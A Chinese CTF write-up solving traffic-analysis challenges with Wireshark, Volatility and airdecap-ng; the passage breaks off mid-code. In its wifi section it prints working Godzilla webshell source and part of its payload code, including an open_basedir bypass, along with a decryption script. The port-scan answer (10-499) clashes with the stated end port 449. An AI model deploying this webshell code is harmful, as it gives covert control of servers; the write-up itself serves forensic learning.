问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
分析流量入门篇
CTF
#写在前面 最近参加了首届陇剑杯,和往常的CTF不太一样,题目基本都是流量分析类型的,我也是第一次接触这方面,还挺有意思的。写的不好的地方请各位师傅多多指正~这里要感谢共同参与比赛的几...
写在前面 ==== 最近参加了首届陇剑杯,和往常的CTF不太一样,题目基本都是流量分析类型的,我也是第一次接触这方面,还挺有意思的。写的不好的地方请各位师傅多多指正~这里要感谢共同参与比赛的几位师傅。 1.签到 ==== 签到题是其中最简单的分析流量了。 Wireshark打开附件Good.pcapng: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-0a06f1cdbec736d751f87a11685ea10422026e23.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-0a06f1cdbec736d751f87a11685ea10422026e23.png) 可以看到可能遭受ARP攻击,所以flag是arp。 2.JWT ===== 这里先来讲一下什么是JWT。 JWT即JSON Web Token。JWT 的原理是,服务器认证以后,生成一个 JSON 对象,发回给用户,以后,用户与服务端通信的时候,都要发回这个JSON对象。服务器完全只靠这个对象认定用户身份。为了防止用户篡改数据,服务器在生成这个对象的时候,会加上签名,服务器就不保存任何session数据了,也就是说,服务器变成无状态了,从而比较容易实现扩展。 那么这里既然涉及到Token,那么题目应该就会从Token值这里来下手了。那么2.2就出现了: 用Wireshark打开附件goroot.pcap: 先在`/identity`下找到了username为admin: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-80d08d524ef2c5d312731ebc346c2de18217441f.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-80d08d524ef2c5d312731ebc346c2de18217441f.png) 然后在对应的cookie里找到了Token值: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7529dec329d7adfbb3f90f73446d21b384ee0aaf.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7529dec329d7adfbb3f90f73446d21b384ee0aaf.png) 将Token值用base64解码之后便可得到id值为10087了。故flag为10087#admin 2.3是寻找黑客获取webshell后的权限,那么首先就是来找`whoami`: 在过滤器里搜索`http matches "(.*?)whoami"` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-fbcc3645d9d3e9923163467c8240f54eeefacb08.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-fbcc3645d9d3e9923163467c8240f54eeefacb08.png) 右键点击追踪流,追踪http流: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b75d4934e87df4786455bfa09933cd211bd0a586.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b75d4934e87df4786455bfa09933cd211bd0a586.png) 然后在追踪该响应包的http流,找到了root权限 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-8037a9a8415bd7d702504cbda7d48b948df1a03d.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-8037a9a8415bd7d702504cbda7d48b948df1a03d.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-6c72f27cb4ae3d1244edc5892769b1faca8f84cc.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-6c72f27cb4ae3d1244edc5892769b1faca8f84cc.png) 这里额外补充其中ios中的查找黑客利用的Github开源项目的名字: 在过滤器里搜索`http matches "(.*?)git"`(或者github也可) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f41a20f53e8c631d753a6abe65a40d5e21cffd3f.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f41a20f53e8c631d753a6abe65a40d5e21cffd3f.png) 可以看到黑客直接在本地用`wget`命令来获取GitHub上的项目,项目名称为Stowaway,这里我们也可以直接复制粘贴访问该项目查看下: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-6c807adba1846970674e3734998c8d093e5d9172.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-6c807adba1846970674e3734998c8d093e5d9172.png) 故flag为stowaway。 2.4是寻找黑客上传的恶意文件名字。那么Wireshark打开附件,要查找上传点的文件一般过滤只看post: `http.request.method=="POST"` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-213ef8ff896b2b7a8293399563f536f60582f2d4.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-213ef8ff896b2b7a8293399563f536f60582f2d4.png) 这里发现一段base64,发现需要分段解出得到一段c语言程序: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-abdbd996c532f05a1ec71afcbe2a4e842d205c5f.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-abdbd996c532f05a1ec71afcbe2a4e842d205c5f.png) 继续往下找 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-ad7fe50124d6f1ccb10bc8917f0cba81f5f80f28.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-ad7fe50124d6f1ccb10bc8917f0cba81f5f80f28.png) 发现`1.c`文件,但不确定继续往下看 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-4d82451939aff9fb28ef1b228acb59ddc4f9effb.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-4d82451939aff9fb28ef1b228acb59ddc4f9effb.png) 这里把1.c文件重命名为了looter.c文件,应该可以确定上传的文件就是1.c了 2.5查找黑客在服务器上编译的恶意so文件名字,这个很简单,有两种解决方法: 一种就直接用Wireshark全局搜索.so即可定位文件名为:looter.so: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-578f8a9620c5fdc22b723d72e282b3aaa03cb839.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-578f8a9620c5fdc22b723d72e282b3aaa03cb839.png) 另外一种方法是直接用记事本打开并搜索`.so`,即可得到想要的答案了: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c1736452dd7be5e08cbf7fc95e1ae436e8d37ffd.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c1736452dd7be5e08cbf7fc95e1ae436e8d37ffd.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-92a5de8ab8eea537ca9292fa28caa48c3cf27937.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-92a5de8ab8eea537ca9292fa28caa48c3cf27937.png) 故flag答案为`looter.so` 3.webshell ========== 3.1需要查找黑客登陆系统使用的密码,这里稍微信息收集下收集到用的是`php`后缀,那么就直接在过滤器里搜索`http.request.method =="POST" && http contains "php"`,点击第一个,查看到密码: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-eebbc4921b7800e97e0af09ba2ccf76ceb2295cf.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-eebbc4921b7800e97e0af09ba2ccf76ceb2295cf.png) 3.2是查找黑客修改的一个日志文件的绝对路径,那么同理还是在过滤器里搜索`http.request.method =="POST" && http contains "php"`,点击找到log文件`data/Runtime/Logs/Home/21_08_07.log`: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-8ea673c11075ae2bcd5a51d9a490ac0cbd6f044e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-8ea673c11075ae2bcd5a51d9a490ac0cbd6f044e.png) 可是这里只是一个相对路径,在响应包中找到对应的`/var/www/html`,拼接一下即为绝对路径flag: `/var/www/html/data/Runtime/Logs/Home/21_08_07.log` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-21b81eae959acb5ea7d6e2cf67317bc5d3544a09.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-21b81eae959acb5ea7d6e2cf67317bc5d3544a09.png) 3.3同2.3一样是寻找黑客获取webshell后的权限,这里用另外一种方法来查找: 在过滤器里搜索`http.request.method =="POST" && http contains "php"`,找到whoami: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-309e2f2e3e4e397b526445dff179dc9ae1b66888.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-309e2f2e3e4e397b526445dff179dc9ae1b66888.png) 右键点击追踪流,追踪http流 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-be974e43e87077b1e98965e776855ed7a685adf3.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-be974e43e87077b1e98965e776855ed7a685adf3.png) 找到对应的响应包 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-87f9f05c91fb57826d672c8fc537026b35e77de2.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-87f9f05c91fb57826d672c8fc537026b35e77de2.png) 右键追踪http流,在其中找到权限 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c6b81fd8382860ef8911240ff7cd0ab6a19a5856.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c6b81fd8382860ef8911240ff7cd0ab6a19a5856.png) 3.4则是查找黑客写入的webshell文件名称,那么用wireshark打开附件hack.pcap: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a84eb5190a82b1ff5287061f71b117ae90340492.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-a84eb5190a82b1ff5287061f71b117ae90340492.png) 直接看到webshell为1.php。 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e2edb8473cc2929705b3c4bc6e589202b226fed9.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e2edb8473cc2929705b3c4bc6e589202b226fed9.png) 3.5是寻找黑客上传的代理工具客户端名字。这个直接定位到最后一个响应包,右键点击追踪流,追踪http流: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b2c1bfd451ee86d036f43339f57fc2a5b5d3c5cd.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-b2c1bfd451ee86d036f43339f57fc2a5b5d3c5cd.png) 在里面找到了frpc和frpc.ini,所以flag就是frpc。这个是啥应该不用多说了。 4.日志分析与简单日志分析 ============= 在日志分析中,开局直接打开txt文件,`ctrl+F`查找200,便找到了`www.zip`,这个即为网络存在源码泄漏所泄露的源码文件名,即flag: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c37b2b0a3f4e1d53578cf7a8059a1fa42a234b6c.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c37b2b0a3f4e1d53578cf7a8059a1fa42a234b6c.png) 然后来了一个查找黑客往/tmp目录写入的一个文件名称,那么直接`ctrl+F`查找200,一直往下翻到一个200的`file`参数,其等于`sess_car`,那么flag就是`sess_car`了: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-d138ba4852d5cf726949179f3f41283f79183276.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-d138ba4852d5cf726949179f3f41283f79183276.png) 最后让我分析攻击流量,分析黑客使用的是什么类来读取了秘密文件。这里找到了一个似乎是用python写的脚本请求: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3d15526685bbe1e08b6c234492e89fc7dd9ef10b.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3d15526685bbe1e08b6c234492e89fc7dd9ef10b.png) 将filename后面这一串放到url编码中解码,可以看到这里是用的php反序列化来读取秘密文件,类为`SplFileObject`,故flag就是`SplFileObject` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-741961190e9b2d50ba2c3d8261de0872ce934334.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-741961190e9b2d50ba2c3d8261de0872ce934334.png) 在简单日志分析中,确实也是比较简单。用记事本打开日志文件: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-32a6cf9cf44839948b8bd88b328215bd11fee423.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-32a6cf9cf44839948b8bd88b328215bd11fee423.png) 即可查看到黑客攻击的参数为user,这个就是flag了。 然后是需要黑客查看的秘密文件的绝对路径。这里找到第二段base64编码数据解开: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f36f0327ebec425d1511f2d39611ab872db0f4a8.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f36f0327ebec425d1511f2d39611ab872db0f4a8.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c00e959220b0657443f8d53e48233a0745fb27fa.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c00e959220b0657443f8d53e48233a0745fb27fa.png) 得到绝对路径:`/Th4s_IS_VERY_Import_Fi1e` 最后是寻找黑客反弹shell的ip和端口。这里找到最后一段base64解密: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-2d5784881ab71cd906d1ae357d4b5c0aac0df87e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-2d5784881ab71cd906d1ae357d4b5c0aac0df87e.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c449ac461bb63e32c0b99a8455b673460da33b9e.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c449ac461bb63e32c0b99a8455b673460da33b9e.png) 或者也可以用burpsuite先url解码,再base64解码可得flag答案:`192.168.2.197:8888` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-521df497464a413bf6326701e3c604c08f295b52.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-521df497464a413bf6326701e3c604c08f295b52.png) [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3606d041ac92f31529831945530b3faec5bd6f35.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3606d041ac92f31529831945530b3faec5bd6f35.png) 5.SQL注入 ======= 记事本打开日志文件直接翻到文件后面 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3d90d055bb4f32783e87eac6aa1616e6c8a16bc4.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-3d90d055bb4f32783e87eac6aa1616e6c8a16bc4.png) 这句是查询字段flag从sqli数据库中的flag表,所以flag答案为:`sqli#flag#flag` 6.端口扫描 ====== 这里讲其中一个查找黑客端口扫描的扫描器的扫描范围。 首先打开统计—端点: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7f756311e8db3c8f4fad3891a2cda012ff277db6.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-7f756311e8db3c8f4fad3891a2cda012ff277db6.png) 按照portB排序,一般而言,端口扫描都是连续性有规则的端口,从这里我们能看到起始端口是10: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-daf92673c65600e2ea09145a01d88dc581a5caca.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-daf92673c65600e2ea09145a01d88dc581a5caca.png) 拉到最底下我们统计出末尾端口为449: [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-681c67503f64df1808f767a6cfbaf6686107b1e7.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-681c67503f64df1808f767a6cfbaf6686107b1e7.png) 那么最终答案便是10-499 7.wifi ====== 描述 -- 网管小王最近喜欢上了ctf网络安全竞赛,他使用“哥斯拉”木马来玩玩upload-labs,并且保存了内存镜像、wifi流量和服务器流量。小王往upload-labs上传木马后进行了`cat /flag`,flag内容究竟是啥呢?(压缩包里有解压密码的提示,需要额外添加花括号) 题解 -- 想要解出这一题需要使用到`Volatility`这个开源的取证框架,这个框架能够对导出的内存镜像镜像分析,能过通过获取内核的数据结构,使用插件获取内存的详细情况和运行状态,同时可以直接dump系统文件,屏幕截图,查看进程等等。 首先内存镜像分析,先看看imageinfo探测系统类型 ```php volatility -f Windows\ 7-dde00fa9.vmem imageinfo ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-ebc394db313d5f1eb0a80fe89e8dfc6d55068a72.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-ebc394db313d5f1eb0a80fe89e8dfc6d55068a72.png) cmdscan查看最近命令,这个命令为导出wifi的密码 ```php volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 cmdscan ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f2f05aa91a8f42066979a6166e1c6e372db4b7bb.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-f2f05aa91a8f42066979a6166e1c6e372db4b7bb.png) filescan查看该文件夹里的东西,发现My\_Wifi.zip ```php volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Program Files" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-1d41e3993c7ef308b17eeb4561205eab86da2123.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-1d41e3993c7ef308b17eeb4561205eab86da2123.png) 打开zip发现hint`password is Network Adapter GUID`,需要网卡的GUID,GUID在Windows的`C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\`文件夹内 ```php volatility -f Windows\ 7-dde00fa9.vmem --profile=Win7SP1x86_23418 filescan | grep "Interfaces" ``` [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-266d85196e7a66a12d93d800de2ea61e06295810.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-266d85196e7a66a12d93d800de2ea61e06295810.png) 为`{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}`,解压后wifi信息为: ```php <?xml version="1.0"?> <WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1"> <name>My_Wifi</name> <SSIDConfig> <SSID> <hex>4D795F57696669</hex> <name>My_Wifi</name> </SSID> </SSIDConfig> <connectionType>ESS</connectionType> <connectionMode>auto</connectionMode> <MSM> <security> <authEncryption> <authentication>WPA2PSK</authentication> <encryption>AES</encryption> <useOneX>false</useOneX> </authEncryption> <sharedKey> <keyType>passPhrase</keyType> <protected>false</protected> <keyMaterial>233@114514_qwe</keyMaterial> </sharedKey> </security> </MSM> </WLANProfile> ``` 发现密码为`233@114514_qwe`,有了这个Wifi密码我们可以解密客户端的cap流量包 ```php airdecap-ng -e My_Wifi -p 233@114514_qwe 客户端.cap ``` 然后分析后找到 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c7bd6f23c1e4a054b82a844424aa73de87fd984a.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-c7bd6f23c1e4a054b82a844424aa73de87fd984a.png) 有一些这种密文,这时候我们再通过服务器那边的流量 [![](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e6ebf6e1b0de5b6db3df3bf341964a6e6d120ce0.png)](https://shs3.b.qianxin.com/attack_forum/2021/09/attach-e6ebf6e1b0de5b6db3df3bf341964a6e6d120ce0.png) 我们可以发现其是两两对应的,我们先拿服务器的流量解密一下 第一层是url解码(太多就不全放出来了) ```php pass=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1Z ``` 然后是 ```php pass=eval(base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD')))); ``` 和 ```php key=R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4/OBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBi省略 ``` 组成,第一段的是一段倒叙base64,解密后得到 ```php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='key'; $payloadName='payload'; $key='3c6e0b8a9c15224a'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (stripos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } } ``` 然后我们可以看到第二段的加密形式是一个xor,稍微写一下解密脚本: ```php import base64 import os def decode(D,K): D = list(D) for i in range(len(D)): c = K[i+1&15] D[i] = D[i]^c return bytes(D) _pass = 'pass' key = '3c6e0b8a9c15224a' p='R0YEQgNVBE0GQ0YPU0YTUhoeTAtvMkVmMHRmD1NGE1IaHkwLbzIHTA1SQVtdWkFBFlhNFBJVEhAYPD8SEhRBQQZyAFYxQRJNBlxzR1xXSRpYO28QQhhBHTxicGEPEgZWF2UAQxFRDldLGA4/OBRBE0N2FlURSwhWDW5GRlNGFRtKDWg6QhhBGUdCUEFBXQ56BwsIVFcQElwQQlxdXGsIV0sfTAtvMkEZQxFcVBIcCEAQUxEYRmcyfDBifH18b0VABkUWWQ1xBWRKGE4/OBRBE0MWRRBCHD5qJmIIR1xHBEEKVwlZGF1JETAAeFtFbThBS1QEQwcOVX0GUlpWVxxFbDBzNmMrdy9iR0JQQUFdDnoHa0kUEV0SSgpefFYbGEVABkUWWQ1xBRBKGA4/OBRBE0NLaDpCGEEZI0JQQUFdDl08QRdZFl0+Wg9eRlcaHVo+aTtvEEIYQVAFER1RU1oiUg9aIkoLSCVcAF5RVxodXA5SEENwC0smQwpBZkZAUQBeSxIVXRERSEJuOxUSEhRBE0MWQUAPS1xeGVVQUV1QBBtHRghDSwNsM0MRFRJPOWsTQxZFVg1KDFgXYVRAU1kERwZETRQSVRIQWDw/PzgUQRNDXwMQSlESSgZFHRZtZyRgOBQHSRJZEko8XkVXXGsDUhBTAVkQGjwQRRcRbWFxMmhBVBxAA0sSZgxBUFxtVgBABlIMQkBlXAQXQ0BXG09sOUMWRRBCGEEZI1NMQlNHEmwMRgBePVoASgZVXEAaHVo+aRZFEEJFbDNuOxUSEhRFQQZFEFwWBQRPAl1zR1xXSRpYO289aBhBGUNYUxIaED5gJmVEDV9WFFUPGE4/OBRBE0MWRRBCSwRKEFhaXG1HFVIRQk0ZWTVrGUMRFRISFEEXPGUgYzFxLnc4FUZXQUcIXCpSOA0AWRJcVQVqV1xXDlcGHjYBL1EWYDpDHUFXRghSD18fVUocPmomYhweFkcEQBBfCnkGEUgCbjsVEhIUQRNDFiVDB0sSUAxfakVAXRVWPFUJXxFdSRBYPD8SEhRBTm48aDpCGEEZClcVGlFVD3ACWgl3GFERfA1SWlZXHEgaGDtvEEIYQRlDERUWQFESRg9CWFcYXQ9aDFVQGhZGBEAWWhEcVBFaNGkRFRISSWw5bjxFEEIYE1wXREdcEhATVhBDCURZNWtEbjtTR1xXFVoMWEVjU3UITjpoRxoWcE0XKB8ePWgYQRlDV1pAGhAIDlMNQVleSxVLD1RbGhZwSAhHX04bSxgaNGkRFRISFEETQxIha0ZRPBleERF2aRAIbj0SLmtKHAgSUhgQAwdpWj5pFkUQQkVsM0MRFRJAURVGEVhFFCYDbDMePD9UR1oCRwpZCxAQXSVcBWJMQUZRDHUWWAYYS0NsM0MRFRJbUkEbQlAQXgFMCFYNblBKW0cVQEsUA1kOXT5eBkVqUV1aFVYNQhYSSxFBQm47FRISFEETQxYDRQxbFVAMXxVUW1gEbARTEW8BVw9NBl9BQRoQB1oPU0wQGTVrGUMRFRISFEETQxZFFAQYXBkjV1pCV1pJFwVfCVVOGhNbQRgOPzgUQRNDFkUQQhhBGUMVVl1cQARdF0VFDUJeAFUQVA4/OBRBE0MWRRBCGEEZQ1hTEhoQBxpDTWg6QhhBGUMRFRISFEETQxZFEAZXQUJDFVZdXEAEXRdFRR5fGAdeBkVGGhZSSAhDS0VHClENXEMZFFRXWwcbR1BMGVk1axlDERUSEhRBE0MWRU1vMkEZQxEVEhIUQRNDFgNTDlcSXEsVUxsJOWsTQxZFEEIYQRlDERVAV0AUQQ0WQVMNVhVcDUVGCT8+QRNDFkUQQhgcNGkRFRISSWw5QxZFEAteQRFCV0BcUUAIXA1pAEgLSx' p1 = base64.b64decode(p) res = decode(p1,key.encode()) f = open('res.php','wb') f.write(res) f.close() ``` 得到res.php ```php $parameters=array(); $_SES=array(); function run($pms){ reDefSystemFunc(); $_SES=&getSession(); @session_start(); $sessioId=md5(session_id()); if (isset($_SESSION[$sessioId])){ $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId))); } @session_write_close(); if (canCallGzipDecode()==1&&@isGzipStream($pms)){ $pms=gzdecode($pms); } formatParameter($pms); if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){ @bypass_open_basedir(); } $result=evalFunc(); if ($_SES!==null){ session_start(); $_SESSION[$sessioId]=base64_encode(S1MiwYYr(serialize($_SES),$sessioId)); @session_write_close(); } if (canCallGzipEncode()){ $result=gzencode($result,6); } return $result; } function S1MiwYYr($D,$K){ for($i=0;$i<strlen($D);$i++) { $D[$i] = $D[$i]^$K[($i+1)%15]; } return $D; } function reDefSystemFunc(){ if (!function_exists("file_get_contents")) { function file_get_contents($file) { $f = @fopen($file,"rb"); $contents = false; if ($f) { do { $contents .= fgets($f); } while (!feof($f)); } fclose($f); return $contents; } } if (!function_exists('gzdecode')&&function_existsEx("gzinflate")) { function gzdecode($data) { return gzinflate(substr($data,10,-8)); } } } function &getSession(){ global $_SES; return $_SES; } function bypass_open_basedir(){ @$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']); $allFiles = @scandir($_FILENAME); $cdStatus=false; if ($allFiles!=null){ foreach ($allFiles as $fileName) { if ($fileName!="."&&$fileName!=".."){ if (@is_dir($fileName)){ if (@chdir($fileName)===true){ $cdStatus=true; break; } } } } } if(!@file_exists('bypass_open_basedir')&&!$cdStatus){ @mkdir('bypass_open_basedir'); } if (!$cdStatus){ @chdir('bypass_open_basedir'); } @ini_set('open_basedir','..'); @$_FILENAME = @dirname($_SERVER['SCRIPT_FILENAME']); @$_path = str_replace("\\",'/',$_FILENAME); @$_num = substr_count($_path,'/') + 1; $_i = 0; while($_i < $_num){ @chdir('..'); $_i++; } @ini_set('open_basedir','/'); if (!$cdStatus){ @rmdir($_FILENAME.'/'.'bypass_open_basedir'); } } function formatParameter($pms){ global $parameters; $index=0; $key=null; while (true){ $q=$pms[$index]; if (ord($q)==0x02){ $len=bytesToInteger(getBytes(substr($pms,$index+1,4)),0); $index+=4; $value=substr($pms,$index+1,$len); $index+=$len; $parameters[$key]=$value; $key=null; }else{ $key.=$q; } $index++; if ($index>strlen($pms)-1){ break; } } } function evalFunc(){ try{ @session_write_close(); $className=get("codeName"); $methodName=get("methodName"); $_SES=&getSession(); if ($methodName!=null){ if 